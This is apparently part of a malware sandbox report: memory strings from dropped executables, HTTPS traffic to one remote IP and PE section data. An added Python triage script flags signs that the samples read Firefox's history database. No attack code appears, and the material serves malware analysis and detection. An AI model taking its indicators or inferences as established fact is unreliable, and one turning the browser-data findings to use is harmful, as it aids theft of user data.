Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/8bad2467092e6ddeb0dfa9e5ea54d86d26790ca7ba2ce88d1
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServiceipc:first-content-process-c
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EEE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2946205914.00000099786FC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/91
Source: file.exe, 00000000.00000003.1767913034.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641410618.0000000005A18000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2785886618.0000000005BB5000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/cQWpLyAVcZI.exe
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.1767913034.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641410618.0000000005A18000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2785886618.0000000005BB5000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001D.00000002.2946205914.00000099786FC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/cleanupTemporaryAddons/promise
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/aInstanceID
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
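Editor's note on reading the string list above (this paragraph and the script are added here and are not part of the sandbox report): most of these URLs were dumped from firefox.exe, which is the sandbox's own browser (see the 118.0.1 support URLs), so they are embedded browser resources and not indicators. The lines worth attention are the ones sourced from file.exe, e192e43b61.exe and K7IHXYTNUQJPI2M9UU0ECLE1K.exe. Several of those end in the URL's own hostname written backwards with a trailing dot ("gro.allizom.www.", "gro.allizom.troppus."), which is exactly how Firefox's places.sqlite stores the moz_places.rev_host column; the 12-character token that follows matches the length of moz_places.guid. That these strings come from the sample reading the Firefox history/bookmark database is an inference from the layout, not something the report states. The script below, assumed names and all, parses lines in the report's "Source: ... String found in binary or memory: ..." format, groups strings by originating process, and flags the rev_host-shaped artifacts; the four sample lines are copied from the report.

```python
"""Triage helper for the 'String found in binary or memory' lines of a
sandbox report: group URL strings by the process they were dumped from and
flag strings that carry a Firefox moz_places rev_host (+ guid) suffix."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: four lines copied verbatim from the report.
SAMPLE_LINES = [
    "Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5",
    "Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2",
    "Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF",
    "Source: file.exe, 00000000.00000003.1732680990.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof",
]

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) String found in binary or memory: (?P<s>\S+)$"
)

# The sandbox's own browser; its embedded URLs are noise for triage
# (hypothetical set, extend it with other benign helper processes).
BROWSER_PROCS = {"firefox.exe"}


def parse_line(line):
    """Return (process names, found string) for one report line, else None.

    The source field alternates 'process, dump-id.sdmp' pairs; only the
    process names are kept."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parts = [p.strip() for p in m.group("src").split(",")]
    procs = tuple(p for p in parts if not p.endswith(".sdmp"))
    return procs, m.group("s")


def split_rev_host(s):
    """Detect a URL immediately followed by its own host reversed and
    dot-terminated, the form Firefox keeps in moz_places.rev_host.

    Returns (url, trailing token) on a hit, else None.  The trailing
    12-character token in the report matches the length of
    moz_places.guid; reading it as a guid is an inference."""
    parts = urlsplit(s)
    host = parts.hostname
    if not host:
        return None
    rev = host[::-1] + "."
    # Search only after the netloc so the host itself cannot match.
    start = len(parts.scheme) + 3 + len(parts.netloc)
    idx = s.find(rev, start)
    if idx < 0:
        return None
    return s[:idx], s[idx + len(rev):]


def triage(lines):
    """Group found strings by process and collect rev_host-shaped artifacts."""
    by_proc = defaultdict(list)
    artifacts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        procs, s = parsed
        for p in procs:
            by_proc[p].append(s)
        hit = split_rev_host(s)
        if hit is not None:
            url, token = hit
            artifacts.append({"procs": procs, "url": url, "token": token})
    non_browser = {p: v for p, v in by_proc.items() if p not in BROWSER_PROCS}
    return {"by_proc": dict(by_proc), "non_browser": non_browser,
            "artifacts": artifacts}


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for proc, strings in sorted(result["non_browser"].items()):
        print(f"{proc}: {len(strings)} string(s) outside the browser")
    for a in result["artifacts"]:
        print("moz_places-style artifact:", a["procs"], a["url"],
              "guid?", a["token"])
```

Run it over the full "String found in binary or memory" section of a report (one line per list entry) to separate the browser's own strings from those in the dropped payloads; the rev_host check is a heuristic and will not fire on a URL that was read from a different browser's database or truncated before the reversed host.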
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50062 version: TLS 1.2

System Summary

Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a4f7615f-9
Source: 5e28f62265.exe, 0000000E.00000000.2797533174.00000000009B2000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_40c7b221-1
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name:
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: .rsrc
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name: .idata
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name:
Source: random[1].exe.7.dr Static PE information: section name: .rsrc
Source: random[1].exe.7.dr Static PE information: section name: .idata
Source: e192e43b61.exe.7.dr Static PE information: section name:
Source: e192e43b61.exe.7.dr Static PE information: section name: .rsrc
Source: e192e43b61.exe.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr Static PE information: section name: .idata
Source: random[1].exe0.7.dr Static PE information: section name:
Source: b0b9f39429.exe.7.dr Static PE information: section name:
Source: b0b9f39429.exe.7.dr Static PE information: section name: .rsrc
Source: b0b9f39429.exe.7.dr Static PE information: section name: .idata
Source: b0b9f39429.exe.7.dr Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name: .idata
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr Static PE information: section name:
